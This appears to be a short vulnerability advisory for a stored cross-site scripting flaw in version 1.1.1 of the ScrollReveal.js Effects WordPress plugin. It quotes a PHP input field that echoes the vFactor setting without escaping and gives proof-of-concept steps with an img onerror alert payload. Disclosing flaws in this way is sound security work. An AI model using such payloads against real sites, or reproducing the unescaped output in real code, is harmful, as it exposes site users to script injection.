WordPress ScrollReveal.js Effects plugin version 1.1.1 suffers from a persistent cross site scripting vulnerability.
# Exploit Title: WordPress Plugin ScrollReveal.js Effects - Stored Cross Site Scripting
# Date: 25-04-2022
# Exploit Author: Mariam Tariq - Hunt3rsherlock_
# Vendor Homepage: https://wordpress.org/plugins/scrollrevealjs-effects/
# Version: 1.1.1
# Tested on: Firefox
# Contact me: [email protected]
# Vulnerable Code:
```
<input id="src-opacity" type="text" name="sr_config[vFactor]" value="<?php
echo $options['vFactor']; ?>" placeholder="Element ratio in float" />
```
# POC
1. Install ScrollReveal.js Effects WordPress plugin and activate.
2. Go to configuration and on vFactor field inject XSS payload “><img src=x
onerror=alert(‘’XSS>
3. XSS will trigger.
## PoC Image
https://imgur.com/a/uQRT2mD
https://imgur.com/1BB80ep
